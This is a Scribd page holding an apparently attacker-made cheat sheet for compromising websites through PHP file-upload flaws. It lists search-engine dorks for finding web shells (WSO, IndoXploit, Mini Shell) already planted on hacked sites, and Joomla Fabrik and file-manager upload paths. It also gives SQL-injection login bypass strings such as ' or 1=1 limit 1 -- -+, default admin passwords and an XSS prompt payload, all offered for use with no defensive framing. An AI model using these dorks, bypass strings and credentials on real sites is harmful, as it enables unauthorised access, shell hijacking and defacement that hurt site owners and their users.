Scribd
Upload
8K views3 pages

PHP File Upload Exploits Overview

The document contains a list of potential hacking dorks and exploits that can be used to find vulnerabilities on websites, like directories containing PHP shells, login pages without authentication, and file upload vulnerabilities. It also includes common credentials for logging into admin panels.

Uploaded by

Haidar Dzaky
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
8K views3 pages

PHP File Upload Exploits Overview

The document contains a list of potential hacking dorks and exploits that can be used to find vulnerabilities on websites, like directories containing PHP shells, login pages without authentication, and file upload vulnerabilities. It also includes common credentials for logging into admin panels.

Uploaded by

Haidar Dzaky
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
  • Script Indices
  • Credential Listings

-intitle:index of intext:cgi-bin intext:48K intext:2021-03

-index of intext:[Link]
-intext:Uploader-By Phenix-TN & [Link]
-index of [Link]
-index of [Link]

dork:::::
DORK:
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] Intex:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:48k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:48k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:64k
index of [Link]
index of [Link]
inititle:index od intext:cgi-bin intext:48k intext:2021-03
inurl:[Link]?option=com_fabrik
inurl:[Link]/component/fabrik/ site:[Link]
inurl:[Link]?option=com_fabrik&view= site:[Link]
inurl:[Link] site:[Link]
inurl:/user_login.php
inurl:/fine_uploader.php
inurl:/[Link] site:[Link]
powered by: [Link]
Intext:"Powered by OpenSID"
intitle:"login" /[Link]
intext:"Parent Directory"
inurl:/portal/home/kontak_view
"Webdesign by: [Link]"
"Webdesign by: [Link]"
"Webdesign by: [Link]"
intitle:?Ajax File Manager? site:au
inurl:/[Link] intext:?/Root Folder?
inurl:/[Link] intext:?upload?
inurl:/[Link] .ac.
intitle:?index of? intext:?[Link]?
inurl:cffm/[Link]
inurl:cffm/cffm
"IFM Improved File Manager"
inurl:"subir_foto.php"
inurl:"[Link] site:[Link]
intitle:index of / [Link]
intitle:index of / [Link]
intitle:index of / [Link]
intitle:index of / [Link]
intitle:index of / [Link]
intitle:index of / [Link]
intext:drwxr WSO intext:2020-08
intext:drwxr intext:2020-08 site:com
intext:drwxr intext:2020-08-05
intitle:sh3ll ext:php ?/public_html/?
intitle:?IndoXploit? filetype:php
intitle:"- WSO 4.2.6"
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] Intex:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:48k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:64k
intitle:index of [Link] intext:48k
intitle:index of [Link] intext:64k
intext:drwxr intitle:./Trenggalek Mafia ext:php
intext:drwxr intitle:[Link] ext:php
intext:#1 SMP
intitle:index of inurl:/img/[Link]
intitle:Mini Shell intext:/public_html/admin
intitle:Private intext:images/
intext:drwxr site:.
intext:"Linux" intitle:"Uploader"filetype:php
intitle:"Mini Shell" filetype:php
intitle:"Mini Shell" filetype:phtml
intitle:"IndoXploit" filetype:php
intext:"Priv8" filetype:php
inurl:/images/ intitle:sh3|l ext:php
intitle:sh3|l ext:php "/public_html/"
intitle:"IndoXploit" filetype:php
intitle:"IndoXploit" intext:"public_html" filetype:php
intitle:"IndoXploit" intext:"mass deface"
filetype:php
intitle:"IndoXploit" intext:"mass delete"
filetype:php
intitle:"IndoXploit" intext:"jumping" filetype:php
intitle:"IndoXploit" intext:"config" filetype:php
intitle:"Marijuana shell"
intitle:"CHips L Pro sangad" intext:"drwxr"
intitle:"J3mb03dz m4w0tz sh311" intext:"drwxr"
intitle:"sh3ll" intext:"public_html"
Exploit :
[Link]?
option=com_fabrik&format=raw&task=[Link]&plugin=fileupload&method=ajax_u
pload
/admin_login.php
fine_uploader.php
/panel/pages/[Link]
/images/[Link]
/asset/filemanager/[Link]
admin/[Link]?message=
/plugins/tinymce/js/tinymce/plugins/filemanager/[Link]
live dork:
[Link]
option=com_fabrik&format=raw&task=[Link]&plugin=fileupload&method=ajax_u
pload
[Link]
[Link]
[Link]
[Link]
User & pw =
' or 1=1 limit 1 -- -+
User: admin
Pass: sid304
User: admin
Pass: sid310
user: operator
pass: qwerty
admin/admin
admin/admin123
administrator/administrator
user:'="or'
pw: '="or'
payload:
javascript:prompt()
letak:
/uploads/[Link]

You might also like